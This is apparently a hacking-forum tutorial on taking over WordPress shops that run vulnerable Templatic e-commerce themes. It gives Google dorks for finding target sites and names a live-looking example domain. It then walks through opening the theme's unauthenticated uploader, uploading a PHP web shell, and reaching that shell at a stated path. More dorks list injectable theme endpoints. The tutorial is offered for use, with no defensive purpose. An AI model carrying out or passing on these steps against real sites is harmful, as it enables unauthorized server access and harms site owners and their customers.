This is an Old Exploit
WordPress Themes Vulnerable to this Exploit:
- Code:
-
WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework
Tutorial
1. Go to google and search this dork:
- Code:
-
"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse
2. Click on any Website
Example:
[You must be registered and logged in to see this link.]Right Click and click view page source:[You must be registered and logged in to see this image.]3. Locate theme within source code.
[You must be registered and logged in to see this image.]Which is:
- Code:
-
http://shopshack.net/wp-content/themes/framework/
Notice that the theme is
/framework/We now have found a vulnerable theme to test exploit.
4. Next, add
/upload/ to the end of the URL after /framework/
[You must be registered and logged in to see this image.]5. Use the Uploader to upload your shell. (Supports: .php .txt .html)
Shell Access:
- Code:
-
/wp-content/uploads/products_img/SHELL.php
More Dorks:
- Code:
-
inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=
Credits to: HackForums